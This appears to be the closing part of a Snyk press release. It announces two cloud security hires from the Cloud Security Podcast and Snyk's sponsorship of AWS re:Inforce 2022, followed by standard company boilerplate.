In timing with AWS re:Inforce, Snyk has introduced two new cloud security hires, Ashish Rajan and Shilpi Bhattacharjee, founders of the Cloud Security Podcast, which is now officially powered by Snyk. In their new roles, Ashish will be Snyk's first Cloud Security Advocate, while Shilpi will continue to serve as Lead Program Manager for the Cloud Security Podcast. As with the Secure Developer Podcast and DevSecCon, Snyk is committed to continuing to build these global communities that foster education and thought leadership and promote secure development. Please visit here to read more about what's ahead for Ashish, Shilpi, and the incredible cloud security community that they have fostered over the last several years.

Snyk is a Diamond sponsor at AWS re:Inforce, a learning conference focused on security, compliance, identity, and privacy taking place in Boston, July 26-27, 2022. Snyk Cloud is currently available on a limited basis, with general availability planned for fall 2022. To see Snyk Cloud in action, visit the company's booth (#408) or sign up for a demo here.

About Snyk

Snyk is the leader in developer security. We empower the world's developers to build secure applications and equip security teams to meet the demands of the digital world. Our developer-first approach ensures organizations can secure all of the critical components of their applications from code to cloud, leading to increased developer productivity, revenue growth, customer satisfaction, cost savings, and an overall improved security posture. Snyk's Developer Security Platform automatically integrates with a developer's workflow and is purpose-built for security teams to collaborate with their development teams. Snyk is used by 2,000+ customers worldwide today, including industry leaders such as Asurion, Google, Intuit, MongoDB, New Relic, Revolut, and Salesforce.
